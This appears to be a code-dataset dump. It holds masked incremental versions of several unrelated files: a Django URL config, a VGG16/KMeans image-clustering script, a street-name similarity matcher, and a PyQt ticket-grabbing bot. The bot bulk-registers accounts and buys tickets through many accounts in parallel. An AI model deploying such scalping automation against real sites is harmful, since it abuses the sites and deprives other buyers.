print(mat[i][j].fila, mat[i][j].columna,mat[i][j].nombre, mat[i][j].color)\n \n # print(mat)\n\n \n matriz = (propiedades, mat)\n\n # for i in nodos:\n # print(i.nombre, i.color, i.columna, i.fila)\n\n graficar_matriz(matriz)\n \n# leer_archivo_matriz(\"Matriz.lfp\")",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('product', views.ProductCreateAndList.as_view()), path(
'product/<int:pk>', views.ProductRetrieve.as_view())]
<|reserved_special_token_1|>
from django.urls import path
from . import views
urlpatterns = [path('product', views.ProductCreateAndList.as_view()), path(
'product/<int:pk>', views.ProductRetrieve.as_view())]
<|reserved_special_token_1|>
from django.urls import path
from . import views
urlpatterns = [
path('product', views.ProductCreateAndList.as_view()),
path('product/<int:pk>', views.ProductRetrieve.as_view()),
]
|
flexible
|
{
"blob_id": "d21b89285d4b4c73a08bda746cea31b5a13d1050",
"index": 1967,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('product', views.ProductCreateAndList.as_view()), path(\n 'product/<int:pk>', views.ProductRetrieve.as_view())]\n",
"step-3": "from django.urls import path\nfrom . import views\nurlpatterns = [path('product', views.ProductCreateAndList.as_view()), path(\n 'product/<int:pk>', views.ProductRetrieve.as_view())]\n",
"step-4": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('product', views.ProductCreateAndList.as_view()),\n path('product/<int:pk>', views.ProductRetrieve.as_view()),\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import time
import os, os.path
import random
import cv2
import glob
import keras
import matplotlib
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.cluster import KMeans
from sklearn.mixture import GaussianMixture
from sklearn.decomposition import PCA
import pandas as pd
import numpy as np
#DIR = "./Data_example_ph2"
#codes = os.listdir(DIR)
#codes.pop(0)
#codes.sort()
def load_imgs():
    """Load every image under DIR into memory.

    Each subdirectory of DIR is treated as one class; the directory name
    becomes the label of every image inside it.  Images are resized to
    224x224, converted BGR -> RGB and scaled to [0, 1].

    Returns:
        tuple[np.ndarray, np.ndarray]: (images, labels) where images has
        shape (n, 224, 224, 3) and labels holds the directory names.

    NOTE(review): relies on a module-level DIR constant that is commented
    out above -- DIR must be defined before calling this function.
    """
    result_imgs = []
    result_labels = []
    for category in os.listdir(DIR):
        # macOS Finder drops .DS_Store entries; they are not class folders.
        if category == '.DS_Store':
            continue
        path = os.path.join(DIR, category)
        for file_name in os.listdir(path):
            image = cv2.imread(os.path.join(path, file_name))
            image = cv2.resize(image, (224, 224))
            image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
            # Normalise to [0, 1] floats for the network input.
            image = np.asarray(image) / 255
            result_imgs.append(image)
            result_labels.append(category)
    return np.asarray(result_imgs), np.asarray(result_labels)
#X_train,X_lables = load_imgs()
#vgg16_model = keras.applications.vgg16.VGG16(include_top=False, weights="imagenet", input_shape=(224,224,3))
def covnet_transform(covnet_model, raw_images):
    """Run `raw_images` through `covnet_model` and flatten each prediction.

    Returns a 2-D array with one row per input image, suitable as a
    feature matrix for clustering.
    """
    features = covnet_model.predict(raw_images)
    # One flat feature vector per image.
    return features.reshape(raw_images.shape[0], -1)
def create_train_kmeans(data, number_of_clusters):
    """Fit a KMeans model on `data` and report how long training took.

    n_jobs=-1 uses every available CPU core, which matters once the data
    set grows; the fixed random_state keeps runs reproducible.
    """
    model = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)
    started = time.time()
    model.fit(data)
    # Report wall-clock training time.
    print("Training took {} seconds".format(time.time() - started))
    return model
#vgg16_output = covnet_transform(vgg16_model, X_train)
#K_vgg16 = create_train_kmeans(vgg16_output)
#k_vgg16_pred = K_vgg16.predict(vgg16_output)
def cluster_label_count(clusters, labels):
    """Cross-tabulate cluster assignments against true labels.

    Returns a DataFrame whose columns are the clusters and whose rows are
    the labels; each cell counts how often that pair occurred together.
    """
    # Start every cluster/label cell at zero so absent pairs still appear.
    count = {c: {l: 0 for l in set(labels)} for c in set(clusters)}
    for c, l in zip(clusters, labels):
        count[c][l] += 1
    return pd.DataFrame(count)
#vgg16_pred_codes = [codes[x] for x in k_vgg16_pred]
from sklearn.metrics import accuracy_score, f1_score
def print_scores(true, pred):
    """Format macro-F1 and accuracy for the given true/predicted labels.

    Despite the name, nothing is printed -- the formatted string is
    returned for the caller to display.
    """
    acc = accuracy_score(true, pred)
    f1 = f1_score(true, pred, average="macro")
    # BUG FIX: both placeholders used index 0, so the "Accuracy" slot
    # displayed the F1 value; index 1 now shows the real accuracy.
    return "\n\tF1 Score: {0:0.8f} | Accuracy: {1:0.8f}".format(f1, acc)
#print("KMeans VGG16:", print_scores(X_lables, vgg16_pred_codes))
|
normal
|
{
"blob_id": "9c8a213fc8a7397662eebb74d6ee1ad34cb884d9",
"index": 1420,
"step-1": "<mask token>\n\n\ndef create_train_kmeans(data, number_of_clusters):\n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n start = time.time()\n k.fit(data)\n end = time.time()\n print('Training took {} seconds'.format(end - start))\n return k\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_imgs():\n category_dir = os.listdir(DIR)\n stats = []\n result_imgs = []\n result_labels = []\n for thing in category_dir:\n if thing != '.DS_Store':\n label = thing\n path = os.path.join(DIR, thing)\n file_names = os.listdir(path)\n for file in file_names:\n result_labels.append(label)\n image = cv2.imread(os.path.join(path, file))\n image = cv2.resize(image, (224, 224))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = np.asarray(image)\n image = image / 255\n result_imgs.append(image)\n result_imgs = np.asarray(result_imgs)\n result_labels = np.asarray(result_labels)\n return result_imgs, result_labels\n\n\n<mask token>\n\n\ndef create_train_kmeans(data, number_of_clusters):\n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n start = time.time()\n k.fit(data)\n end = time.time()\n print('Training took {} seconds'.format(end - start))\n return k\n\n\n<mask token>\n\n\ndef print_scores(true, pred):\n acc = accuracy_score(true, pred)\n f1 = f1_score(true, pred, average='macro')\n return '\\n\\tF1 Score: {0:0.8f} | Accuracy: {0:0.8f}'.format(f1, acc)\n",
"step-3": "<mask token>\n\n\ndef load_imgs():\n category_dir = os.listdir(DIR)\n stats = []\n result_imgs = []\n result_labels = []\n for thing in category_dir:\n if thing != '.DS_Store':\n label = thing\n path = os.path.join(DIR, thing)\n file_names = os.listdir(path)\n for file in file_names:\n result_labels.append(label)\n image = cv2.imread(os.path.join(path, file))\n image = cv2.resize(image, (224, 224))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = np.asarray(image)\n image = image / 255\n result_imgs.append(image)\n result_imgs = np.asarray(result_imgs)\n result_labels = np.asarray(result_labels)\n return result_imgs, result_labels\n\n\n<mask token>\n\n\ndef create_train_kmeans(data, number_of_clusters):\n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n start = time.time()\n k.fit(data)\n end = time.time()\n print('Training took {} seconds'.format(end - start))\n return k\n\n\ndef cluster_label_count(clusters, labels):\n count = {}\n unique_clusters = list(set(clusters))\n unique_labels = list(set(labels))\n for cluster in unique_clusters:\n count[cluster] = {}\n for label in unique_labels:\n count[cluster][label] = 0\n for i in range(len(clusters)):\n count[clusters[i]][labels[i]] += 1\n cluster_df = pd.DataFrame(count)\n return cluster_df\n\n\n<mask token>\n\n\ndef print_scores(true, pred):\n acc = accuracy_score(true, pred)\n f1 = f1_score(true, pred, average='macro')\n return '\\n\\tF1 Score: {0:0.8f} | Accuracy: {0:0.8f}'.format(f1, acc)\n",
"step-4": "import time\nimport os, os.path\nimport random\nimport cv2\nimport glob\nimport keras\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.cluster import KMeans\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nimport numpy as np\n\n\ndef load_imgs():\n category_dir = os.listdir(DIR)\n stats = []\n result_imgs = []\n result_labels = []\n for thing in category_dir:\n if thing != '.DS_Store':\n label = thing\n path = os.path.join(DIR, thing)\n file_names = os.listdir(path)\n for file in file_names:\n result_labels.append(label)\n image = cv2.imread(os.path.join(path, file))\n image = cv2.resize(image, (224, 224))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = np.asarray(image)\n image = image / 255\n result_imgs.append(image)\n result_imgs = np.asarray(result_imgs)\n result_labels = np.asarray(result_labels)\n return result_imgs, result_labels\n\n\ndef covnet_transform(covnet_model, raw_images):\n pred = covnet_model.predict(raw_images)\n flat = pred.reshape(raw_images.shape[0], -1)\n return flat\n\n\ndef create_train_kmeans(data, number_of_clusters):\n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n start = time.time()\n k.fit(data)\n end = time.time()\n print('Training took {} seconds'.format(end - start))\n return k\n\n\ndef cluster_label_count(clusters, labels):\n count = {}\n unique_clusters = list(set(clusters))\n unique_labels = list(set(labels))\n for cluster in unique_clusters:\n count[cluster] = {}\n for label in unique_labels:\n count[cluster][label] = 0\n for i in range(len(clusters)):\n count[clusters[i]][labels[i]] += 1\n cluster_df = pd.DataFrame(count)\n return cluster_df\n\n\nfrom sklearn.metrics import accuracy_score, f1_score\n\n\ndef print_scores(true, pred):\n acc = accuracy_score(true, pred)\n f1 = f1_score(true, pred, average='macro')\n return '\\n\\tF1 Score: {0:0.8f} | 
Accuracy: {0:0.8f}'.format(f1, acc)\n",
"step-5": "import time\nimport os, os.path\nimport random\nimport cv2\nimport glob\nimport keras\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.cluster import KMeans\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.decomposition import PCA\n\n\nimport pandas as pd\nimport numpy as np\n\n\n#DIR = \"./Data_example_ph2\"\n#codes = os.listdir(DIR)\n#codes.pop(0)\n#codes.sort()\n\ndef load_imgs():\n category_dir = os.listdir(DIR)\n stats=[]\n result_imgs = []\n result_labels = []\n for thing in category_dir:\n if thing!='.DS_Store':\n label= thing\n path = os.path.join(DIR,thing)\n file_names = os.listdir(path)\n for file in file_names:\n result_labels.append(label)\n image = cv2.imread(os.path.join(path,file))\n image = cv2.resize(image, (224,224))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = np.asarray(image)\n image =image/255\n result_imgs.append(image)\n result_imgs = np.asarray(result_imgs)\n result_labels = np.asarray(result_labels)\n return result_imgs,result_labels\n\n#X_train,X_lables = load_imgs()\n\n#vgg16_model = keras.applications.vgg16.VGG16(include_top=False, weights=\"imagenet\", input_shape=(224,224,3))\n\n\ndef covnet_transform(covnet_model, raw_images):\n\n # Pass our training data through the network\n pred = covnet_model.predict(raw_images)\n\n # Flatten the array\n flat = pred.reshape(raw_images.shape[0], -1)\n \n return flat\n\ndef create_train_kmeans(data, number_of_clusters):\n # n_jobs is set to -1 to use all available CPU cores. This makes a big difference on an 8-core CPU\n # especially when the data size gets much bigger. 
#perfMatters\n \n k = KMeans(n_clusters=number_of_clusters, n_jobs=-1, random_state=728)\n # Let's do some timings to see how long it takes to train.\n start = time.time()\n\n # Train it up\n k.fit(data)\n\n # Stop the timing \n end = time.time()\n\n # And see how long that took\n print(\"Training took {} seconds\".format(end-start))\n \n return k\n\n#vgg16_output = covnet_transform(vgg16_model, X_train)\n\n#K_vgg16 = create_train_kmeans(vgg16_output)\n#k_vgg16_pred = K_vgg16.predict(vgg16_output)\n\ndef cluster_label_count(clusters, labels):\n \n count = {}\n \n # Get unique clusters and labels\n unique_clusters = list(set(clusters))\n unique_labels = list(set(labels))\n \n # Create counter for each cluster/label combination and set it to 0\n for cluster in unique_clusters:\n count[cluster] = {}\n \n for label in unique_labels:\n count[cluster][label] = 0\n \n # Let's count\n for i in range(len(clusters)):\n count[clusters[i]][labels[i]] +=1\n \n cluster_df = pd.DataFrame(count)\n \n return cluster_df\n\n\n#vgg16_pred_codes = [codes[x] for x in k_vgg16_pred]\n\nfrom sklearn.metrics import accuracy_score, f1_score\n\ndef print_scores(true, pred):\n acc = accuracy_score(true, pred)\n f1 = f1_score(true, pred, average=\"macro\")\n return \"\\n\\tF1 Score: {0:0.8f} | Accuracy: {0:0.8f}\".format(f1,acc)\n\n#print(\"KMeans VGG16:\", print_scores(X_lables, vgg16_pred_codes))\n\n\n\n",
"step-ids": [
1,
3,
4,
6,
7
]
}
|
[
1,
3,
4,
6,
7
] |
from difflib import SequenceMatcher
import csv
naam = "straat"
def similar(a, b):
    """Return the difflib similarity ratio between strings a and b (0..1)."""
    matcher = SequenceMatcher(None, a, b)
    return matcher.ratio()
# Read the street-name list (first line is a header) and report every
# entry whose similarity to `naam` exceeds 0.7.
# FIX: the file was opened without ever being closed -- use a context
# manager; also compute the similarity once instead of twice per name.
with open("straten.txt", "r") as f:
    f.readline()  # skip the header line
    names = f.readlines()

for name in names:
    candidate = name[:-1]  # drop the trailing newline
    sim = similar(candidate.lower(), naam.lower())
    if sim > 0.7:
        print("gevonden: " + candidate + " ---- " + naam + " ---- " + str(sim))
# with open('straatnamen.csv') as csvfile:
# reader = csv.DictReader(csvfile)
# for row in reader:
# print(row['straatnaam'])
|
normal
|
{
"blob_id": "2f1193e3ab5e0527ab5f89141613eddb18b5f61d",
"index": 2787,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\n<mask token>\nf.readline()\n<mask token>\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-3": "<mask token>\nnaam = 'straat'\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\nf = open('straten.txt', 'r')\nf.readline()\nnames = f.readlines()\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-4": "from difflib import SequenceMatcher\nimport csv\nnaam = 'straat'\n\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n\nf = open('straten.txt', 'r')\nf.readline()\nnames = f.readlines()\nfor name in names:\n if similar(name[:-1].lower(), naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(), naam.lower())\n print('gevonden: ' + name[:-1] + ' ---- ' + naam + ' ---- ' + str(sim))\n",
"step-5": "from difflib import SequenceMatcher\nimport csv\nnaam = \"straat\"\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\nf = open(\"straten.txt\", \"r\")\nf.readline()\nnames = f.readlines()\n\nfor name in names:\n if similar(name[:-1].lower(),naam.lower()) > 0.7:\n sim = similar(name[:-1].lower(),naam.lower())\n print(\"gevonden: \" + name[:-1] + \" ---- \" + naam + \" ---- \" + str(sim))\n\n\n\n\n# with open('straatnamen.csv') as csvfile:\n# reader = csv.DictReader(csvfile)\n# for row in reader:\n# print(row['straatnaam'])\n\n\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import ctypes
import win32con
import request_spider
from selenium_tickets_spider import *
from threading import Thread
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import Qt, QThread, pyqtSignal
import sys, time, re
import datetime
SESSION_DATA = False
SHOW_S_P = False
class Worker(QThread):
    """Background Qt thread that polls the global SESSION_DATA flag and
    emits valueChanged(1024) whenever the flag is set, then clears it."""

    valueChanged = pyqtSignal(int)  # emitted when SESSION_DATA flips to True
    handle = -1  # Win32 thread handle (-1 until OpenThread succeeds)

    def run(self):
        global SESSION_DATA,EXIT_COND
        try:
            # Grab a Win32 handle to the current Qt thread (Windows-only:
            # ctypes.windll) so it can be manipulated via the Windows API.
            self.handle = ctypes.windll.kernel32.OpenThread( # @UndefinedVariable
                win32con.PROCESS_ALL_ACCESS, False, int(QThread.currentThreadId()))
        except Exception as e:
            print('get thread handle failed', e)
        # print('thread id', int(QThread.currentThreadId()))
        # Poll the shared flag forever, forwarding it to the GUI as a signal.
        while True:
            if SESSION_DATA:
                self.valueChanged.emit(1024)
                SESSION_DATA = False
            time.sleep(0.1)

    def exit_thread(self):
        # Hard-exits the whole process (not just this thread).
        os._exit(122)
class Ui_MainWindow(QMainWindow):
threads = []
keywordJudge = ''
    def __init__(self):
        """Start the log-forwarding daemon threads and the Worker QThread.

        NOTE(review): output_buy_record / output_login_status /
        output_register_record and the global `ex` are defined elsewhere
        in this module.
        """
        super(Ui_MainWindow, self).__init__()
        # self.ex = Example()
        self.buy_succeed_count = 0  # successful purchases shown in the UI
        # Daemon threads that continuously pump log output into the UI.
        for func in [self.output_buy_record, self.output_login_status,self.output_register_record]:
            thr = Thread(target=func)
            thr.setDaemon(True)
            thr.start()
        # Worker thread: forwards the SESSION_DATA flag to ex.create_c.
        self._thread = Worker(self)
        self._thread.finished.connect(self._thread.deleteLater)
        self._thread.valueChanged.connect(ex.create_c)
        self._thread.start()
    def setupUi(self, MainWindow):
        """Build the three-tab GUI (login / purchase centre / registration)
        and wire the buttons to their handlers.  Layout follows the usual
        Qt Designer-generated style: widgets first, then translated texts."""
        # MainWindow.setStyleSheet("#MainWindow{background-color: yellow}")
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(640, 478)
        # MainWindow.setMinimumSize(640, 478)
        # MainWindow.setMaximumSize(640, 478)
        # Disable the maximise button.
        MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
        # Fix the window size.
        MainWindow.setFixedSize(self.width(), self.height())
        # MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
        self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))
        self.tabWidget.setObjectName("tabWidget")
        self.tab = QtWidgets.QWidget()
        self.tab.setObjectName("tab")
        # Login button.
        self.pushButton = QtWidgets.QPushButton(self.tab)
        self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))
        self.pushButton.setObjectName("pushButton")
        # Input box: number of accounts to log in.
        self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)
        self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))
        self.lineEdit_tab.setPlaceholderText(" 请输入登陆个数")
        # Login-log output label.
        self.label_0 = QtWidgets.QLabel(self.tab)
        self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))
        self.label_0.setObjectName("label_0")
        # Log browser on the login tab (original comment: registration log).
        self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)
        self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))
        self.textBrowser_2.setObjectName("textBrowser_2")
        # Login page.
        self.tabWidget.addTab(self.tab, "")
        self.tab_2 = QtWidgets.QWidget()
        self.tab_2.setObjectName("tab_2")
        # NOTE(review): self.tab is added a second time here; this looks
        # like it was meant to be self.tab_2 -- confirm before changing.
        self.tabWidget.addTab(self.tab, "")
        self.tab_3 = QtWidgets.QWidget()
        self.tab_3.setObjectName("tab_3")
        self.lineEdit = QtWidgets.QLineEdit(self.tab_2)
        self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))
        self.lineEdit.setObjectName("lineEdit")
        # Product-name search button.
        self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)
        self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))
        self.pushButton_2.setObjectName("pushButton_2")
        self.pushButton_2.clicked.connect(self.search_1)
        self.label = QtWidgets.QLabel(self.tab_2)
        self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))
        self.label.setObjectName("label")
        self.label_2 = QtWidgets.QLabel(self.tab_2)
        self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))
        self.label_2.setObjectName("label_2")
        self.comboBox = QtWidgets.QComboBox(self.tab_2)
        self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))
        self.comboBox.setObjectName("comboBox")
        # self.comboBox.currentText()
        self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)
        self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))
        self.comboBox_2.setObjectName("comboBox_2")
        # Quantity selection label.
        self.label_3 = QtWidgets.QLabel(self.tab_2)
        self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))
        self.label_3.setObjectName("label_3")
        # Quantity input box.
        self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)
        self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))
        self.lineEdit_1.setObjectName("lineEdit_1")
        # Successful-purchase count labels.
        self.label_6 = QtWidgets.QLabel(self.tab_2)
        self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))
        self.label_6.setObjectName("label_6")
        self.label_7 = QtWidgets.QLabel(self.tab_2)
        self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))
        self.label_7.setObjectName("label_7")
        self.label_7.setStyleSheet("font-size:16px;color:red") # set font colour
        self.label_8 = QtWidgets.QLabel(self.tab_2)
        self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))
        self.label_8.setObjectName("label_8")
        self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)
        self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))
        self.lineEdit_8.setObjectName("lineEdit_8")
        self.lineEdit_8.setText('4')
        # Buy button: clicked once all options have been chosen.
        self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)
        self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))
        self.pushButton_3.setObjectName("pushButton_3")
        self.pushButton_3.clicked.connect(self.search_2)
        # Quit-program button.
        self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)
        self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))
        self.pushButton_quit.setObjectName("pushButton_quit")
        self.pushButton_quit.clicked.connect(self.exit_quit)
        self.label_4 = QtWidgets.QLabel(self.tab_2)
        self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))
        self.label_4.setObjectName("label_4")
        # Purchase-log output browser.
        self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)
        self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))
        self.textBrowser_1.setObjectName("textBrowser")
        # Add display data.
        # self.textBrowser_1.append('购买日志')
        # Ticket-grabbing centre page.
        self.tabWidget.addTab(self.tab_2, "")
        MainWindow.setCentralWidget(self.centralwidget)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        # Account-registration page.
        self.tabWidget.addTab(self.tab_3, "")
        MainWindow.setCentralWidget(self.centralwidget)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        # Register button.
        self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)
        self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))
        self.pushButton_4.setObjectName("pushButton")
        # Input box: number of accounts to register.
        self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)
        self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))
        self.lineEdit_tab3.setPlaceholderText(" 请输入注册个数")
        # Registration-log output browser.
        self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)
        self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))
        self.textBrowser_3.setObjectName("textBrowser_3")
        self.label_5 = QtWidgets.QLabel(self.tab_3)
        self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))
        self.label_5.setObjectName("label_5")
        # Translated texts and signal wiring (Qt Designer convention).
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "城市售票网-抢票"))
        self.pushButton.setText(_translate("MainWindow", "点击登录"))
        self.pushButton.clicked.connect(self.login)
        self.pushButton_4.clicked.connect(self.register)
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "账号登录"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "抢购中心"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate("MainWindow", "账号注册"))
        self.label_0.setText(_translate("MainWindow", "登录日志:"))
        self.pushButton_2.setText(_translate("MainWindow", "搜索名称"))
        self.pushButton_3.setText(_translate("MainWindow", "点击购买"))
        self.pushButton_quit.setText(_translate("MainWindow", "退出程序"))
        self.pushButton_4.setText(_translate("MainWindow", "点击注册"))
        self.label.setText(_translate("MainWindow", "已择场次:"))
        self.label_2.setText(_translate("MainWindow", "已择价格:"))
        self.label_3.setText(_translate("MainWindow", "购买总数量:"))
        self.label_4.setText(_translate("MainWindow", "购买日志:"))
        self.label_5.setText(_translate("MainWindow", "注册日志:"))
        self.label_6.setText(_translate("MainWindow", "已购买:"))
        self.label_7.setText(_translate("MainWindow", "0"))
        self.label_8.setText(_translate("MainWindow", "每个账号购买数量:"))
        self.textBrowser_3.setText("")
        self.textBrowser_2.setText("")
        self.textBrowser_1.setText("")
        self.tabWidget.setCurrentIndex(0)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    # Executed when the login button is clicked.
    def login(self):
        """Read the requested account count and log that many accounts in.

        Login IDs are scraped from 'infomation.txt'; each account is opened
        in its own daemon thread via BuyUrbtix.openSite.
        """
        try:
            regiterSum = int(self.lineEdit_tab.text())
        except Exception as err:
            # Non-numeric input: warn the user and abort.
            res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok) # message box
            return
        ipList = [""]
        # ipList = request_tickets_spider.get_ip_list(10)
        self.textBrowser_2.append("开始登陆,请等待...")
        userinfo_list = []
        with open('infomation.txt', 'rt', encoding='utf-8') as f:
            info_record = re.findall("'loginId': '(.*?)'", f.read())
            for loginId in info_record:
                userinfo_list.append(loginId)
        # One daemon thread per account (up to the requested count).
        for thr in userinfo_list[:regiterSum]:
            grabber = BuyUrbtix()
            ip = random.choice(ipList)
            Thread_name = Thread(target=grabber.openSite, args=(thr,ip))
            self.threads.append(Thread_name)
            Thread_name.setDaemon(True)
            Thread_name.start()
# 点击搜索按钮执行
def search_1(self):
keyword = self.lineEdit.text()
self.textBrowser_1.append("正在查询 %s 的所有场次和价格..." % keyword)
if keyword == self.keywordJudge:
self.textBrowser_1.append("请等待...")
self.keywordJudge = ''
return
self.keywordJudge = keyword
Thread_name = Thread(target=self.refresh)
self.threads.append(Thread_name)
Thread_name.start()
Thread_01 = Thread(target=self.show_session_data)
self.threads.append(Thread_01)
Thread_01.start()
# 把选择的场次和价格显示到主界面
def show_session_data(self):
global SHOW_S_P
self.comboBox_2.clear()
self.comboBox.clear()
while True:
# if self.ex.sessionName and self.ex.sessionPrice:
if ex.sessionName and ex.sessionPrice and SHOW_S_P:
for i,eventDateName in enumerate(ex.sessionName):
self.comboBox_2.addItem(eventDateName, i)
for i,price in enumerate(ex.sessionPrice):
self.comboBox.addItem(str(price), i)# 价格
self.comboBox.setCurrentIndex(0)
self.comboBox_2.setCurrentIndex(0)
ex.sessionName.clear()
ex.sessionPrice.clear()
SHOW_S_P = False
time.sleep(0.2)
# 把信息刷新到界面
def refresh(self):
try:
if self.lineEdit.text():
global eventDateList
keyword = self.lineEdit.text()
my_attr['selNum'] = self.lineEdit_8.text()
ex.eventDateList = request_spider.get_date_url(keyword)
if ex.eventDateList:
self.textBrowser_1.append("查询成功,请在选择界面选择场次和价格...")
global SESSION_DATA
SESSION_DATA = True
# ex.create_c()
else:
self.textBrowser_1.append("查询失败,请确定您查询的节目存在...")
else:
sys.exit()
except Exception as err:
self.textBrowser_1.append("查询失败,请确定您查询的节目存在...")
print(err)
sys.exit()
# 日志更新
def output_login_status(self):
# 登录成功输出
while True:
# 登陆日志
login_record_list = login_record()
if login_record_list:
for i in login_record_list:
self.textBrowser_2.append(i)
self.textBrowser_2.moveCursor(self.textBrowser_2.textCursor().End)
login_record_list.remove(i)
time.sleep(0.1)
# 购买日志
def output_buy_record(self):
while True:
buy_record_list = buy_record()
if buy_record_list:
for record in buy_record_list:
if "购买成功" in record:
self.buy_succeed_count += 1
self.label_7.setText(str(self.buy_succeed_count))
self.textBrowser_1.append(record)
self.textBrowser_1.moveCursor(self.textBrowser_1.textCursor().End)
buy_record_list.remove(record)
time.sleep(0.1)
# 注册日志
def output_register_record(self):
while True:
register_record_list = register_record()
if register_record_list:
for i in register_record_list:
self.textBrowser_3.append(i)
self.textBrowser_3.moveCursor(self.textBrowser_3.textCursor().End)
register_record_list.remove(i)
time.sleep(0.1)
# 购买条件选择后点击执行
def search_2(self):
if not self.lineEdit_1.text():
self.textBrowser_1.append("请输入购买总数量...")
return
if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:
self.textBrowser_1.append("正在购买,请等待...")
return
if ex.saleTime:
Thread_name = Thread(target=self.wait_sale)
Thread_name.setDaemon(True)
Thread_name.start()
return
my_attr['gross'] = self.lineEdit_1.text()
my_attr['selNum'] = self.lineEdit_8.text()
my_attr['selPrice'] = ex.eventPrice
my_attr['selSeatUrl'] = ex.eventUrl
self.textBrowser_1.append("开始购买,请您耐心等待...")
